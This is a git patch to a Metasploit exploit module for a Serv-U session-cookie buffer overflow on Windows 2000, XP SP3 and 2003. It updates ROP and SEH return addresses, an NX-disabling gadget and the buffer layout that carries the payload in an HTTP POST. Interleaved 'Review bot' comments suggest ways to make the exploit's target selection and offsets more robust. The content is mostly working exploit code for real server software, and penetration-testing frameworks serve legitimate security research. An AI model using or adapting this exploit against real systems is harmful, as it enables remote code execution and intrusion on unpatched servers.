From b54a7aa1d3cf23a22ebee6b68916d78f45dddf33 Mon Sep 17 00:00:00 2001
From: Joshua Drake
Date: Sat, 21 Nov 2009 17:44:09 +0000
Subject: [PATCH] confirmed SEH target works on Windows XP SP3

git-svn-id: file:///home/svn/framework3/trunk@7576 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/http/servu_session_cookie.rb | 27 +++++++++----------
 1 file changed, 13 insertions(+), 14 deletions(-)

diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb
index a3caff000c..6a31317cd5 100644
--- a/modules/exploits/windows/http/servu_session_cookie.rb
+++ b/modules/exploits/windows/http/servu_session_cookie.rb
@@ -13,7 +13,8 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 
-  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
 
   def initialize(info = {})
     super(update_info(info,
@@ -53,20 +54,18 @@ class Metasploit3 < Msf::Exploit::Remote
       [
         [ 'Windows 2003 SP2 English (NX)',
           {
-            'OS' => '2003SP2',
             'FixESP' => 0x0fb02849, # add esp, 0x40c / ret @libeay32
             'FixESI' => 0x78a31e96, # pop esi / ret @mfc90u.dll
             'FixEBP' => 0x78a4ae99, # push esp / pop ebp / ret 0xc @mfc90u.dll
             'Ret' => 0x78a3e987, # ret 0x20 @mfc90u.dll
             'DisableNX' => 0x7c83f547, # NX Disable @ntdll.dll
-            'JmpESP' => 0x78b2c753, # jmp esp @mfc90u.dll
+            'JmpESP' => 0x78b2c753 # jmp esp @mfc90u.dll
           }
         ],
-
-        [ 'Windows 2000 SP4 English',
+
+        [ 'Windows 2000 SP4 and XP SP3 English (SEH)',
           {
-            'OS' => '2000SP4',
-            'Ret' => 0x0fb870bd, # pop pop ret @libeay32.dll
+            'Ret' => 0x0fb870bd # pop pop ret @libeay32.dll
           }
         ],
       ],
@@ -81,12 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
 
-    # hit end of stack..
     sploit = Rex::Text.rand_text(1000) * 75
 
-    if (target['OS'] =~ /2003/)
+    if (target.name =~ /NX/)
 
       # new SEH handler (point esp into buffer)
       sploit[41000,4] = [target['FixESP']].pack('V')
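Review bot: Removing the `'OS'` key from both targets leaves `exploit` choosing the buffer layout by pattern-matching the display name (`target.name =~ /NX/` in the next hunk, with the unconditional `else` in the last hunk taking every other target), so a rename or a third target silently changes which path runs. A dedicated key in the target hash is the more robust discriminator — e.g. a constructed `'Technique' => 'NX'` on the first target, tested as `target['Technique'] == 'NX'` — and the `else` branch should then reject an unknown value rather than fall through to the SEH layout. The `exploit` method that consumes these targets is only partially visible across the later hunks.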
@@ -101,12 +99,13 @@ class Metasploit3 < Msf::Exploit::Remote
       sploit[52+24,2] = "\xeb\x20"
       sploit[52+40,payload.encoded.length] = payload.encoded
 
-    elsif (target['OS'] =~ /2000/)
-
-      sploit[41000-4,4] = "\xeb\x06\x90\x90"
-      sploit[41000,4] = [target['Ret']].pack("V")
+    else
+
+      seh = generate_seh_record(target.ret)
+      sploit[40996,seh.length] = seh
       sploit[41004,payload.encoded.length] = payload.encoded
-    end
+
+    end
 
     req = "POST / HTTP/1.1\r\n"
     req << "Host: #{rhost}:#{rport}\r\n"
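Review bot: The new SEH branch writes the record at `40996` and the payload at `41004` while the NX branch above uses `41000`, and the commit also drops the only comment (`# hit end of stack..`) that explained this region, so the buffer layout is now documented nowhere in `exploit`. A comment above the new `seh = ...` line, such as `# 8-byte SEH record (nSEH + handler) starts at 40996; payload follows it`, would preserve that information, and spelling the payload offset as `40996 + seh.length` makes the dependency on the record length explicit instead of implied by the literal. The `if` that this `else` belongs to opens in an earlier hunk.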